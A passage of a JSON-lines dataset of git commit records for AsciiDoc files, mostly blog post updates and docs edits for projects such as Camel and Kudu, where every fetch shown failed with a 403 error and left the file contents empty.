ng-boot,zhanhb\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,mbogoevici\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,vpavic\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f46d21faeab9e1dae45f0895b4402c0339be338","subject":"fixed typo for apoc.index.addAllNodes","message":"fixed typo for apoc.index.addAllNodes\n","repos":"larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"948e3120f2fe33107f0acce16ee9472c85630894","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c3551ae82f2e7dbeb6630c18c073a5ee191060","subject":"Update 2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","message":"Update 2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","new_file":"_posts\/2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50a01b31e7a8ac5aeb14ca7a6ca7f694a4fb33c","subject":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","message":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329a8db366d0ec4296f7fc5e15024dc572a49d8b","subject":"Added MIME-Multipart dataformat docs to Gitbook","message":"Added MIME-Multipart dataformat docs to Gitbook\n","repos":"jonmcewen\/camel,zregvart\/camel,yuruki\/camel,veithen\/camel,RohanHart\/camel,sirlatrom\/camel,veithen\/camel,cunningt\/camel,davidkarlsen\/camel,christophd\/camel,kevinearls\/camel,Fabryprog\/camel,dmvolod\/camel,gautric\/camel,ssharma\/camel,ullgren\/camel,adessaigne\/camel,jonmcewen\/camel,bgaudaen\/camel,zregvart\/camel,nboukhed\/camel,salikjan\/camel,mgyongyosi\/camel,JYBESSON\/camel,tadayosi\/camel,curso007\/camel,mcollovati\/camel,onders86\/camel,w4tson\/camel,jonmcewen\/camel,bhaveshdt\/camel,jamesnetherton\/camel,ssharma\/camel,snurmine\/camel,acartapanis\/camel,ullgren\/camel,tdiesler\/camel,objectiser\/camel,cunningt\/camel,adessaigne\/camel,DariusX\/camel,lburgazzoli\/apache-camel,mgyongyosi\/camel,sabre1041\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,nicolaferraro\/camel,hqstevenson\/camel,NickCis\/camel,adessaigne\/camel,lburgazzoli\/camel,tdiesler\/camel,yuruki\/camel,sabre1041\/camel,prashant2402\/camel,pkletsko\/camel,anton-k11\/camel,anoordover\/camel,akhettar\/camel,Thopap\/camel,nikhilvibhav\/camel,veithen\/camel,christophd\/camel,NickCis\/camel,anton-k11\/camel,CodeSmell\/camel,nboukhed\/camel,jamesnetherton\/camel,jarst\/camel,drsquidop\/camel,DariusX\/camel,JYBESSON\/camel,mgyongyosi\/camel,apache\/camel,NickCis\/camel,lburgazzoli\/camel,jarst\/camel,mgyongyosi\/camel,pkletsko\/camel,isavin\/camel,pax95\/camel,kevinearls\/camel,ssharma\/camel,w4tson\/camel,sabre1041\/camel,jarst\/camel,salikjan\/camel,jkorab\/camel,davidkarlsen\/camel,gilfernandes\/camel,Fabryprog\/camel,snurmine\/camel,pkletsko\/camel,prashant2402\/camel,nikhilvibhav\/camel,ssharma\/camel,hqstevenson\/camel,ullgren\/camel,sirlatrom\/camel,driseley\/camel,allancth\/camel,anton-k11\/camel,DariusX\/camel,lburgazzoli\/camel,sabre1041\/camel,dmvolod\/camel,akhettar\/camel,tlehoux\/camel,cunningt\/camel,jonmcewen\/camel,pmoerenhout\/camel,onders86\/camel,RohanHart\/camel,ssharma\/camel,drsquidop\/camel,drsquidop\/camel,scranton\/camel,driseley\/camel,ullgren\/camel,akhettar\/camel,neoramon\/camel,tkopczynski\/camel,jkorab\/camel,w4tson\/camel,neoramon\/camel,christophd\/camel,pmoerenhout\/camel,kevinearls\/camel,gilfernandes\/camel,bgaudaen\/camel,allancth\/camel,jamesnetherton\/camel,tkopczynski\/camel,gilfernandes\/camel,lburgazzoli\/camel,apache\/camel,anoordover\/camel,isavin\/camel,allancth\/camel,gautric\/camel,pax95\/camel,punkhorn\/camel-upstream,pax95\/camel,driseley\/camel,christophd\/camel,acartapanis\/camel,jonmcewen\/camel,mcollovati\/camel,akhettar\/camel,jamesnetherton\/camel,jamesnetherton\/camel,sverkera\/camel,lburgazzoli\/apache-camel,Thopap\/camel,pmoerenhout\/camel,NickCis\/camel,adessaigne\/camel,allancth\/camel,snurmine\/camel,curso007\/camel,acartapanis\/camel,rmarting\/camel,nicolaferraro\/camel,isavin\/camel,kevinearls\/camel,tadayosi\/camel,tlehoux\/camel,gilfernandes\/camel,hqstevenson\/camel,tadayosi\/camel,driseley\/camel,bgaudaen\/camel,pmoerenhout\/camel,ssharma\/camel,prashant2402\/camel,dmvolod\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,neoramon\/camel,akhettar\/camel,chirino\/camel,yuruki\/camel,CodeSmell\/camel,w4tson\/camel,anton-k11\/camel,nboukhed\/camel,sabre1041\/camel,scranton\/camel,cunningt\/camel,drsquidop\/camel,jarst\/camel,onders86\/camel,pax95\/camel,alvinkwekel\/camel,gautric\/camel,chirino\/camel,tkopczynski\/camel,dmvolod\/camel,curso007\/camel,bgaudaen\/camel,mgyongyosi\/camel,hqstevenson\/camel,tdiesler\/camel,scranton\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,rmarting\/camel,anoordover\/camel,sirlatrom\/camel,tlehoux\/camel,dmvolod\/camel,yuruki\/camel,jonmcewen\/camel,RohanHart\/camel,punkhorn\/camel-upstream,gilfernandes\/camel,acartapanis\/camel,w4tson\/camel,tkopczynski\/camel,veithen\/camel,rmarting\/camel,bgaudaen\/camel,nikhilvibhav\/camel,scranton\/camel,jkorab\/camel,nikhilvibhav\/camel,lburgazzoli\/camel,prashant2402\/camel,sverkera\/camel,bgaudaen\/camel,rmarting\/camel,gnodet\/camel,allancth\/camel,apache\/camel,Thopap\/camel,punkhorn\/camel-upstream,RohanHart\/camel,rmarting\/camel,bhaveshdt\/camel,neoramon\/camel,neoramon\/camel,onders86\/camel,jkorab\/camel,tlehoux\/camel,kevinearls\/camel,drsquidop\/camel,anoordover\/camel,lburgazzoli\/apache-camel,jkorab\/camel,chirino\/camel,tadayosi\/camel,christophd\/camel,sverkera\/camel,adessaigne\/camel,rmarting\/camel,snurmine\/camel,chirino\/camel,tkopczynski\/camel,JYBESSON\/camel,snurmine\/camel,dmvolod\/camel,anton-k11\/camel,isavin\/camel,lburgazzoli\/apache-camel,jkorab\/camel,zregvart\/camel,Fabryprog\/camel,scranton\/camel,nicolaferraro\/camel,objectiser\/camel,bhaveshdt\/camel,chirino\/camel,prashant2402\/camel,lburgazzoli\/camel,objectiser\/camel,tlehoux\/camel,driseley\/camel,gnodet\/camel,mcollovati\/camel,NickCis\/camel,gilfernandes\/camel,gnodet\/camel,nboukhed\/camel,chirino\/camel,isavin\/camel,objectiser\/camel,allancth\/camel,tadayosi\/camel,davidkarlsen\/camel,tlehoux\/camel,apache\/camel,kevinearls\/camel,anton-k11\/camel,Thopap\/camel,mcollovati\/camel,curso007\/camel,onders86\/camel,bhaveshdt\/camel,apache\/camel,sirlatrom\/camel,snurmine\/camel,Fabryprog\/camel,tdiesler\/camel,scranton\/camel,sverkera\/camel,pkletsko\/camel,yuruki\/camel,punkhorn\/camel-upstream,pax95\/camel,JYBESSON\/camel,pkletsko\/camel,drsquidop\/camel,sverkera\/camel,driseley\/camel,jarst\/camel,RohanHart\/camel,NickCis\/camel,acartapanis\/camel,JYBESSON\/camel,tadayosi\/camel,CodeSmell\/camel,RohanHart\/camel,sabre1041\/camel,jamesnetherton\/camel,davidkarlsen\/camel,DariusX\/camel,isavin\/camel,anoordover\/camel,bhaveshdt\/camel,Thopap\/camel,christophd\/camel,alvinkwekel\/camel,veithen\/camel,prashant2402\/camel,gautric\/camel,gautric\/camel,nboukhed\/camel,veithen\/camel,hqstevenson\/camel,gnodet\/camel,tdiesler\/camel,neoramon\/camel,pkletsko\/camel,curso007\/camel,pmoerenhout\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,nicolaferraro\/camel,hqstevenson\/camel,gnodet\/camel,yuruki\/camel,tdiesler\/camel,bhaveshdt\/camel,mgyongyosi\/camel,Thopap\/camel,gautric\/camel,w4tson\/camel,sirlatrom\/camel,cunningt\/camel,akhettar\/camel,nboukhed\/camel,onders86\/camel,tkopczynski\/camel,JYBESSON\/camel,adessaigne\/camel,jarst\/camel,curso007\/camel,pax95\/camel,zregvart\/camel,anoordover\/camel","old_file":"components\/camel-mail\/src\/main\/docs\/mime-multipart-dataformat.adoc","new_file":"components\/camel-mail\/src\/main\/docs\/mime-multipart-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20ffc1e1485c457e56f450eec457e3538a0b4005","subject":"Update 2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","message":"Update 2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","new_file":"_posts\/2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b673ecfe933701b3e3554ad8e6310d8ee9e9c42c","subject":"y2b create post $15 Tea Kettle Vs. $1500 Tea Machine","message":"y2b create post $15 Tea Kettle Vs. $1500 Tea Machine","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-18-15-Tea-Kettle-Vs-1500-Tea-Machine.adoc","new_file":"_posts\/2017-02-18-15-Tea-Kettle-Vs-1500-Tea-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc35390619851e39f5616e33aa0837752baffaf","subject":"Update 2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","message":"Update 2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","new_file":"_posts\/2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33364b318b2f23babd5176715570899a7c63d181","subject":"Update 2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","message":"Update 2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","new_file":"_posts\/2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c260a32504e15a196665e6cf087774434fb5bc56","subject":"[docs] Add warning about unsafe-change-config","message":"[docs] Add warning about unsafe-change-config\n\nAdding an explicit warning about unsafe-change-config being unsafe to\navoid users skimming through the docs and deciding this is the command\nthey need.\n\nAlso pointed out that this shouldn't be done if the missing replicas are\na consequence of downed tablet servers and there's a chance of\nrecovering the tablet servers themselves.\n\nChange-Id: I266c050c237a5c2fa286208a154c2a80f906769c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9906\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44b0a1d17666e8915a24e08797279aab98a6c26e","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12de8fbace97b5e1c8010dae80d44aa27a5fa9c1","subject":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","message":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e5cd93c1d8d52ed8e172b897d819440b22ae6f4","subject":"Prec ex","message":"Prec ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764e2a5695c05b2cf0e6a6358e8845c1a3895b21","subject":"Fix broken link reportedby Twitter user","message":"Fix broken link reportedby Twitter user\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/query-dsl\/match-phrase-prefix-query.asciidoc","new_file":"docs\/reference\/query-dsl\/match-phrase-prefix-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77fbe45c9eed31974e8b0a1f0e40562c28184115","subject":"Update 2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","message":"Update 2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_file":"_posts\/2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"264b21ce19abfb88630704a559c2dbab39da1d54","subject":"Create Android.adoc","message":"Create Android.adoc","repos":"Abdennebi\/ProTips","old_file":"Android.adoc","new_file":"Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85a7280b602b272e8125b21a3acf8b74a4bc034a","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a082089a7b9617c6ec13bddd95736e6f13dd1b4e","subject":"Update 2017-07-15-why-we-must-organize.adoc","message":"Update 2017-07-15-why-we-must-organize.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecc3432d3a106965981fcec6055233f6859b78b6","subject":"Update 2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","message":"Update 2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","new_file":"_posts\/2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fecc309ec68f839c8362252cf73f58a4153ddec","subject":"Update 2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","message":"Update 2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","new_file":"_posts\/2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b029af8abb33f428d2079ae9fa06052033077de5","subject":"Update 2016-11-22-100300-Tuesday-Morning.adoc","message":"Update 2016-11-22-100300-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-100300-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-100300-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de115d7c44eab59857a83fa137af5868932e36da","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687bdfa11e09d43e843272b4e8c93881f4042e45","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cad94b329cdc76430a094178fc4cd57df53488b9","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bb3ba821ba6bad2c7398e90a7e13a63882138ab","subject":"Update 2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","message":"Update 2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","new_file":"_posts\/2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af5cc33312cc752bacf02a4ee602c0749d4aee47","subject":"Update 2017-01-10-rub-docker-compose-in-cron-job.adoc","message":"Update 2017-01-10-rub-docker-compose-in-cron-job.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-01-10-rub-docker-compose-in-cron-job.adoc","new_file":"_posts\/2017-01-10-rub-docker-compose-in-cron-job.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbdf912a8e3cdb36bf58ce32836497e0cddfb09c","subject":"Delete Administration.adoc","message":"Delete Administration.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"Administration.adoc","new_file":"Administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90d8e9a1185d16ebf01ad3d8d176d069ba756343","subject":"y2b create post How Many Balls In This Mercedes-Benz?","message":"y2b create post How Many Balls In This Mercedes-Benz?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-30-How-Many-Balls-In-This-MercedesBenz.adoc","new_file":"_posts\/2017-01-30-How-Many-Balls-In-This-MercedesBenz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04dfb334b13079a95c5e6ee62ec54c9a84e6f25b","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888f2f4d75951ecd88d214307f823b9b172626e9","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329c058b82709feedd45482a6948ae86d5b976bb","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 